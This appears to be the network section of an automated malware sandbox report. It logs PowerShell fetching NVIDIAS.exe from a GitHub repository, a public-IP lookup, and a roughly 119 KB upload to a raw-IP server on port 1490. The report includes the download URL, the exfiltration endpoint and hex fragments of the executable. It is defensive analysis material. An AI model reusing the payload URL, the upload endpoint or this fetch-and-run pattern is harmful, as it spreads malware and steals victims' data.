Dec 16, 2024 17:30:27.714523077 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:27.714719057 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.714766979 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.725014925 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:27.725249052 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.725301981 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.746373892 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:27.746556044 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.746607065 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.757807970 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:27.757989883 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.768263102 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:27.768474102 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.768528938 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.768570900 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.790621996 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:27.790781975 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.790860891 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.995383978 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:27.995563030 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.995618105 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.997608900 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:27.997837067 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.997889996 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.022023916 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.022176027 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.022227049 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.043710947 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.043859005 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.043914080 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.056097984 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.056261063 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.056315899 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.086653948 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.086837053 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.086890936 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.109075069 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.109224081 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.109277964 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.109321117 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.130367994 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.130597115 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.130649090 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.156305075 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.156481028 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.156531096 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.167726040 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.167907000 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.167959929 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.268358946 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.268579960 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.268631935 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.287287951 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.287523985 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.287573099 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.312625885 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.312920094 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.312987089 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.335038900 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.335272074 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.335324049 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.356633902 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.356775999 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.356826067 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.377672911 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.377795935 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.377847910 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.388624907 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.388833046 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.388880014 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.412461996 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.412636042 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.435219049 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.435400963 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.435419083 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.467753887 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.467937946 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.478322983 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.478518963 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:28.513653040 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.536565065 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.561970949 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.583075047 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.605907917 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.629363060 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.651484966 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.673429012 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.697140932 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.719824076 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.742041111 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.754005909 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.790797949 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.812171936 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.835036039 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.858971119 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.869510889 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.894464970 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.930051088 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:28.960978985 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:29.012969017 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:30.677814007 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:30.705744982 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:30.705916882 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:30.707114935 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:30.979585886 CET	1490	49710	89.23.100.233	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 17:30:15.729980946 CET	63670	53	192.168.11.20	1.1.1.1
Dec 16, 2024 17:30:15.865897894 CET	53	63670	1.1.1.1	192.168.11.20
Dec 16, 2024 17:30:16.664530993 CET	61608	53	192.168.11.20	1.1.1.1
Dec 16, 2024 17:30:16.799242973 CET	53	61608	1.1.1.1	192.168.11.20
Dec 16, 2024 17:30:20.476927042 CET	49747	53	192.168.11.20	1.1.1.1
Dec 16, 2024 17:30:20.611960888 CET	53	49747	1.1.1.1	192.168.11.20
Dec 16, 2024 17:30:20.929265976 CET	50800	53	192.168.11.20	1.1.1.1
Dec 16, 2024 17:30:21.070827007 CET	53	50800	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 16, 2024 17:30:15.729980946 CET	192.168.11.20	1.1.1.1	0xb3d7	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 17:30:16.664530993 CET	192.168.11.20	1.1.1.1	0xc21a	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 17:30:20.476927042 CET	192.168.11.20	1.1.1.1	0x4146	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 17:30:20.929265976 CET	192.168.11.20	1.1.1.1	0x9c3	Standard query (0)	247.106.0.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 16, 2024 17:30:15.865897894 CET	1.1.1.1	192.168.11.20	0xb3d7	No error (0)	github.com		140.82.113.4	A (IP address)	IN (0x0001)	false
Dec 16, 2024 17:30:16.799242973 CET	1.1.1.1	192.168.11.20	0xc21a	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Dec 16, 2024 17:30:16.799242973 CET	1.1.1.1	192.168.11.20	0xc21a	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Dec 16, 2024 17:30:16.799242973 CET	1.1.1.1	192.168.11.20	0xc21a	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Dec 16, 2024 17:30:16.799242973 CET	1.1.1.1	192.168.11.20	0xc21a	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Dec 16, 2024 17:30:20.611960888 CET	1.1.1.1	192.168.11.20	0x4146	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
Dec 16, 2024 17:30:20.611960888 CET	1.1.1.1	192.168.11.20	0x4146	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
Dec 16, 2024 17:30:21.070827007 CET	1.1.1.1	192.168.11.20	0x9c3	Name error (3)	247.106.0.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

github.com

raw.githubusercontent.com

icanhazip.com

89.23.100.233:1490

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49709	104.16.184.241	80	716	C:\ProgramData\QQQ\NVIDIAS.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 17:30:20.762933016 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Dec 16, 2024 17:30:20.911046982 CET	538	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 16:30:20 GMT Content-Type: text/plain Content-Length: 16 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=WmS8IqDlH10kuzLlhhKWi1WouPCGSraZ.fa86IAWUK8-1734366620-1.0.1.1-UnlmHDgGTcI0WKy6GFFxFFT80XFNXmfC7.ACCSIZqXTu3mI6dghDW7fsOjscrEIMs9NoyznH5.Io.cxBrZhJYA; path=/; expires=Mon, 16-Dec-24 17:00:20 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8f300eb43cae32ef-JAX alt-svc: h3=":443"; ma=86400 Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0a Data Ascii: 102.129.152.205

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49710	89.23.100.233	1490	716	C:\ProgramData\QQQ\NVIDIAS.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 17:30:27.065135002 CET	205	OUT	POST /upload HTTP/1.1 Content-Type: multipart/form-data; boundary="8329d0ed-a884-470e-bcd9-c4075adde960" Host: 89.23.100.233:1490 Content-Length: 119581 Expect: 100-continue Connection: Keep-Alive
Dec 16, 2024 17:30:27.480303049 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 17:30:27.705184937 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 17:30:30.677814007 CET	165	IN	HTTP/1.1 200 OK Server: Werkzeug/3.1.3 Python/3.13.0 Date: Mon, 16 Dec 2024 16:30:30 GMT Content-Type: application/json Content-Length: 61 Connection: close

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49707	140.82.113.4	443	712	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 16:30:16 UTC	200	OUT	GET /pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: github.com Connection: Keep-Alive
2024-12-16 16:30:16 UTC	556	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Mon, 16 Dec 2024 16:30:16 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Access-Control-Allow-Origin: Location: https://raw.githubusercontent.com/pr0niums/Repo/refs/heads/main/NVIDIAS.exe Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-12-16 16:30:16 UTC	3382	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49708	185.199.108.133	443	712	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 16:30:17 UTC	211	OUT	GET /pr0niums/Repo/refs/heads/main/NVIDIAS.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-12-16 16:30:17 UTC	899	IN	HTTP/1.1 200 OK Connection: close Content-Length: 827904 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/octet-stream ETag: "317652998dd72f13454ac04447e72e72256f7ce09ae70676fd3838f322f1f312" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 1996:3A3B9A:146301D:16811AD:67605596 Accept-Ranges: bytes Date: Mon, 16 Dec 2024 16:30:17 GMT Via: 1.1 varnish X-Served-By: cache-gnv1820028-GNV X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1734366617.280570,VS0,VE211 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: fef6e1703c8f0ff7840741b1465efb071649e3ad Expires: Mon, 16 Dec 2024 16:35:17 GMT Source-Age: 0
2024-12-16 16:30:17 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 a4 7d eb 96 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a2 02 00 00 18 00 00 00 00 00 00 1c 7e 0d 00 00 20 00 00 00 e0 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 18 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL}"0~ @ `
2024-12-16 16:30:17 UTC	16384	IN	Data Raw: 28 30 5a a8 fc d4 1e 57 c6 3b 27 d9 b0 3b 69 40 42 55 bf e7 28 d3 54 27 71 a6 0e 11 be 29 e3 a3 96 f1 2f 15 c8 4b 88 20 25 47 c7 53 db 8b b6 e4 7b 06 a0 0d 40 00 9f 74 13 44 c1 da 59 3c 44 4c ab f9 a6 5a 5e b5 4c e6 56 8d 87 b7 0e 32 4c f7 12 a0 bb 2f a3 8f 95 4e de b1 fa 70 d0 dc 2c 32 83 cc a6 e1 36 9a e0 d2 50 c4 b0 5e f3 c8 f0 ef f8 61 9e e4 e6 ad b3 1f a3 71 1f 57 d0 05 c4 16 46 07 89 be 19 4e e6 9c 70 06 21 67 52 40 b7 ef 94 6b 60 7d f7 38 cb 84 2f bd ce 32 0a e9 02 55 8b 40 65 0a 11 0e 18 eb 82 4e b7 c9 10 f6 96 57 6c 5e 1e 42 81 1a 70 cf a9 65 80 9d 51 05 27 e2 dc 7a 16 10 a5 d9 4b 6e a5 9d 6e 90 64 1f 17 28 35 84 02 91 1b d5 06 91 04 66 c5 10 56 62 72 99 27 a5 ea 67 98 35 ba e3 87 ea 29 79 10 9d 24 2d 1e b7 e1 b5 b3 e0 3c 39 62 09 a1 20 f9 76 f7 Data Ascii: (0ZW;';i@BU(T'q)/K %GS{@tDY<DLZ^LV2L/Np,26P^aqWFNp!gR@k`}8/2U@eNWl^BpeQ'zKnnd(5fVbr'g5)y$-<9b v
2024-12-16 16:30:17 UTC	16384	IN	Data Raw: 2c 3f e7 82 73 ca 4f 9d 16 6f cc dd f3 0f a7 54 14 ff 73 d5 db e9 4e 75 31 07 23 e5 5d b9 f3 c8 6e 54 d3 d6 9d ce 36 28 10 11 b4 f2 eb f4 45 8c f4 e8 cb f3 68 a1 f1 9d 8b 6e e4 dc fb 34 9c 82 08 3c 73 bd 9f ba f7 8b d8 16 78 9e 71 f7 40 58 4d 00 53 79 7d 82 29 a0 79 c6 fc f0 fd 6d 0a 6c 7c fb dd 01 a4 ca be f7 53 d8 14 2c 03 4e 89 11 ff e2 3e dc 3a 36 77 2f 0a d6 8f 09 3c f4 f7 69 2b 42 b5 ff f3 ef b3 44 37 c8 ae 03 d3 9f 7c b1 83 63 82 3b 93 3f 28 8a 77 53 03 99 58 10 16 ea af cb 02 cc d6 09 cb 5c e5 99 6c fe c7 0a 0c 68 4e 8c 7a 27 ed b4 f2 76 59 01 b8 a8 3d a8 76 f5 60 b1 92 63 d4 62 89 30 f0 47 c5 2b 32 6a 73 eb 5c 34 4e 2d 27 62 6f ee 3b 8d c8 a3 0f 0f 13 0b 71 54 15 7d ad 20 b0 42 75 1d 5b c7 f5 5e 2f 87 1a c8 87 a5 9d 57 1b d3 5c a3 2d dd 83 f6 d4 Data Ascii: ,?sOoTsNu1#]nT6(Ehn4<sxq@XMSy})yml\|S,N>:6w/<i+BD7\|c;?(wSX\lhNz'vY=v`cb0G+2js\4N-'bo;qT} Bu[^/W\-
2024-12-16 16:30:17 UTC	16384	IN	Data Raw: 74 a8 7e f9 a4 b5 b4 8b fd c4 7f b0 78 29 72 0f 09 cd 50 70 90 69 e8 e1 25 26 86 12 5c 91 a2 bf 9a d6 6c 2f b2 3f 1a 2c de 31 90 a0 f5 de 77 a2 7a 7a cb 49 f7 ec b2 70 83 d4 d0 76 eb d5 e5 82 b0 95 7a 41 ec 05 37 3c 71 9b 58 92 44 9a 2f 87 dc c5 1e 01 66 da b2 23 79 ff 10 61 e5 fc a5 e2 47 52 a5 ce d5 1c ed d9 d8 d3 2d c8 87 4b 57 f4 50 7d 26 a9 23 b0 49 45 8e 18 1d ac 0c d7 36 dd 5e 2f e2 44 9e 8d e5 25 b6 00 a9 64 99 88 9e 5c f5 37 d6 cd 81 5a 71 ef 62 e7 23 1e a5 97 88 46 2a ab 0b c5 ed 73 b9 0e 81 cd b3 65 ea be e7 45 4b 86 98 58 4e e5 91 39 67 59 63 75 68 74 39 4c 30 74 24 22 d3 dd 2f 56 47 4b 0a b2 d8 07 cd 41 7b 94 0b 1c 8d 47 4b fa 4f ed d4 0d b1 1d d7 23 24 a5 dc f7 6b f0 4f 57 de aa 92 20 7b 54 41 de 2e 7d 80 6d 88 82 84 23 b5 65 09 5b b2 51 19 Data Ascii: t~x)rPpi%&\l/?,1wzzIpvzA7<qXD/f#yaGR-KWP}&#IE6^/D%d\7Zqb#F*seEKXN9gYcuht9L0t$"/VGKA{GKO#$kOW {TA.}m#e[Q
2024-12-16 16:30:17 UTC	16384	IN	Data Raw: 75 7b bf c0 70 fe f8 6d 2e ca 79 fa ca b5 46 e7 f3 11 8e 4e 6d 3b 72 cf b8 44 58 d4 9b 4b d2 44 0c e8 5b bf 7a a8 5c c0 94 19 dc 19 ed f1 45 95 01 6b 63 01 58 53 46 ee d0 7c 81 73 86 77 30 51 c8 62 dd df 3b 8b ca 78 25 aa 00 88 17 da 1c 26 e7 fb f8 8f fa 49 71 61 b8 36 be 93 0d 96 51 e3 35 9c 20 47 bb c5 e6 6a c2 9d d6 0d 1b 2e f1 13 c5 11 3d d4 93 55 b1 46 75 f5 87 35 9d 1a b6 46 06 97 f6 77 bf 5b 10 00 fa 55 e5 0a 11 a8 53 07 4a 25 3e 17 2c 07 c3 67 c9 10 f5 7a d5 0c fd aa 35 71 04 2f 9a ef be af 9f c4 4b 61 e1 ba c5 71 9e 03 5a 7a 56 5f 7a 5d 7e de b3 ab b3 08 42 35 ee af 2a ef ff 28 64 fe 98 c3 44 76 c1 64 8f f2 0a c7 4e 7e 8c de 83 17 8f 3d 57 2f 78 b2 4d b1 cb 0b bc 85 1a a4 8c 44 f7 22 aa a7 88 ca 8d 69 a7 ee a0 c0 95 68 3c 8c bf 2e 4d db a6 fb 42 Data Ascii: u{pm.yFNm;rDXKD[z\EkcXSF\|sw0Qb;x%&Iqa6Q5 Gj.=UFu5Fw[USJ%>,gz5q/KaqZzV_z]~B5*(dDvdN~=W/xMD"ih<.MB
2024-12-16 16:30:17 UTC	9064	IN	Data Raw: 5f c5 95 b2 ef 7b 7d a9 14 74 d5 10 5b 17 ba 21 72 08 5a 00 1f 10 63 23 ed 46 3f 19 a4 ea 55 0d 71 37 6b cc a9 2e 5d bf da bc 84 2c ff f9 91 d5 9a 76 6e 78 2e 6e 3b 30 51 d0 52 53 44 0c 94 58 f6 ee 1c 56 f8 d0 91 03 dc a9 59 be f7 18 71 4f 8b e3 ed fb fe 8d 52 35 aa c6 a3 67 e1 a7 a6 75 b2 bb 49 8a 66 f7 b8 f2 8f 9a 7f 29 f5 33 1b 2a 26 41 1f 6f bc 77 df 07 e0 d2 c7 03 29 fb 85 21 a9 b3 1a ec 26 c2 c4 d5 a4 b2 9c 1b 25 7d 91 0e aa 1c 0c 7a 47 23 fb 41 e9 21 66 56 bf 3d 9f 2f 1c 0c 85 c9 e6 b2 52 99 fb ee fb ab 58 df 35 e2 10 70 f1 2b ba ec 2a 58 c2 be 54 ee 7c 87 80 e0 08 fb f4 0e 96 e8 7a 56 2e a7 2e 52 ae bf 58 02 39 58 cc 3d 4b 96 c9 d5 ca 74 fd fc 87 43 c5 18 67 26 5e ba 56 ef 04 07 fe 06 92 08 dd bc b3 6d 0c 25 21 8b 4f c9 88 99 54 df ad 50 ad 22 d1 Data Ascii: _{}t[!rZc#F?Uq7k.],vnx.n;0QRSDXVYqOR5guIf)3&Aow)!&%}zG#A!fV=/RX5p+XT\|zV..RX9X=KtCg&^Vm%!OTP"
2024-12-16 16:30:17 UTC	16384	IN	Data Raw: 52 46 12 1b 4d f8 35 da eb f4 87 21 e7 04 7d 5c 60 b0 da a9 bf aa 0b 40 2b 69 07 82 ca f6 af 8a cd 3c c1 cc aa d6 2e 36 09 d1 db 36 60 ea 30 af e0 08 6e 7a 54 ca 6e 72 5c 4a d0 8d de cf fc 73 09 cd b0 42 b0 43 a9 3e 5f e6 ca 02 4e a6 5b d9 0c c3 74 58 d1 8a 13 0b 6f 5d 71 dd 9d 5a 39 4d 83 d5 76 87 25 93 a0 c3 5f 59 b9 f4 2b 76 4f 29 33 98 02 a2 dd b1 92 5a da f6 34 26 71 e7 0f 0a 78 66 9f 9b 22 fe cd 2a 4a ee 74 44 77 99 3a 59 bf f8 b5 c8 98 2d 3f cf 5e b8 e5 d7 a2 b9 e3 9e d4 d3 92 68 da 92 e5 de 31 17 12 2a 33 a1 f8 41 43 ad 9b c1 30 36 65 c6 1d af 6d d5 d7 fb 5e 12 53 65 f4 16 80 96 34 99 78 e7 ca 6e bd 83 b1 34 4e fa d3 6c df ae f9 95 7d 04 f8 4f a6 86 2c 5e cf a7 25 b1 f9 36 29 de e1 8f 2c f9 80 0a b2 13 d2 96 b3 8f 0a 4e f4 3c 2a a5 21 8c f9 1c de Data Ascii: RFM5!}\`@+i<.66`0nzTnr\JsBC>_N[tXo]qZ9Mv%_Y+vO)3Z4&qxf"JtDw:Y-?^h13AC06em^Se4xn4Nl}O,^%6),N<*!
